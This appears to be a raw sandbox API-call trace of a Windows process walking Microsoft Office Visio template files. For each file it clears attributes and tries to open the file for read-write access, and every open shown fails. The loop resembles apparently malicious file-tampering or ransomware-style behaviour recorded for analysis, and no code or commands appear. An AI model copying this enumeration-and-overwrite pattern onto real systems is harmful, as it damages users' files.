VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.926] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.926] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATMOD_U.VST", dwFileAttributes=0x80) returned 0 [0137.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DATMOD_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\datmod_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.927] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DBMODL_M.VST", dwFileAttributes=0x80) returned 0 [0137.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DBMODL_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dbmodl_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.927] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.927] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DBMODL_U.VST", dwFileAttributes=0x80) returned 0 [0137.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DBMODL_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dbmodl_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.928] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.928] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.928] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DGICON_M.VSS", dwFileAttributes=0x80) returned 0 [0137.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DGICON_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dgicon_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.929] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.929] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.929] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DGICON_U.VSS", dwFileAttributes=0x80) returned 0 [0137.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DGICON_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dgicon_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.929] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.930] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.930] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DIMARC_U.VSS", dwFileAttributes=0x80) returned 0 [0137.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DIMARC_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dimarc_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.930] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.930] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.930] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.930] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DIMENG_M.VSS", dwFileAttributes=0x80) returned 0 [0137.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DIMENG_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dimeng_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.930] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.931] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.931] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DIMENG_U.VSS", dwFileAttributes=0x80) returned 0 [0137.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DIMENG_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dimeng_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.931] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.931] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.931] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRAWTL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRAWTL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\drawtl_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.932] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.932] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.932] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.932] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.932] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRAWTL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRAWTL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\drawtl_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.933] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.933] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.933] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.933] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_M.VSS", dwFileAttributes=0x80) returned 0 [0137.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\drilld_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.933] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.933] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.933] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.933] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.934] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_M.VST", dwFileAttributes=0x80) returned 0 [0137.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\drilld_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.934] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.934] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.934] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.934] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.934] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_U.VSS", dwFileAttributes=0x80) returned 0 [0137.934] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\drilld_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.935] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.935] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.935] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_U.VST", dwFileAttributes=0x80) returned 0 [0137.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DRILLD_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\drilld_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.935] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.935] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.935] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_M.VSS", dwFileAttributes=0x80) returned 0 [0137.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dtlnet_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.936] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.936] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.936] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.936] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.936] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_M.VST", dwFileAttributes=0x80) returned 0 [0137.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dtlnet_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.937] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.937] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_U.VSS", dwFileAttributes=0x80) returned 0 [0137.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dtlnet_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.938] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_U.VST", dwFileAttributes=0x80) returned 0 [0137.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DTLNET_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dtlnet_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.938] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.938] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.938] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DVCALL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DVCALL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dvcall_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.939] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DVCALL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DVCALL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dvcall_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.939] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DWGCNV_M.VTX", dwFileAttributes=0x80) returned 0 [0137.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DWGCNV_M.VTX" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dwgcnv_m.vtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.940] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.940] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.940] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.940] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DWGCNV_U.VTX", dwFileAttributes=0x80) returned 0 [0137.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\DWGCNV_U.VTX" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\dwgcnv_u.vtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.940] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.940] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.941] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.941] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eechip_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.943] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.943] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.943] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.943] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.943] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_M.VST", dwFileAttributes=0x80) returned 0 [0137.943] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eechip_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.943] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.944] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.944] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.944] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.944] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.944] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eechip_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.945] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.945] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_U.VST", dwFileAttributes=0x80) returned 0 [0137.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECHIP_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eechip_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.945] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.945] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.945] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.945] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.946] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECOMP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECOMP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eecomp_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.946] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.946] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.946] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.947] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.947] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECOMP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EECOMP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eecomp_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.947] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.947] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.947] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.947] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.948] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEFUND_M.VSS", dwFileAttributes=0x80) returned 0 [0137.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EEFUND_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eefund_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.948] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.948] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 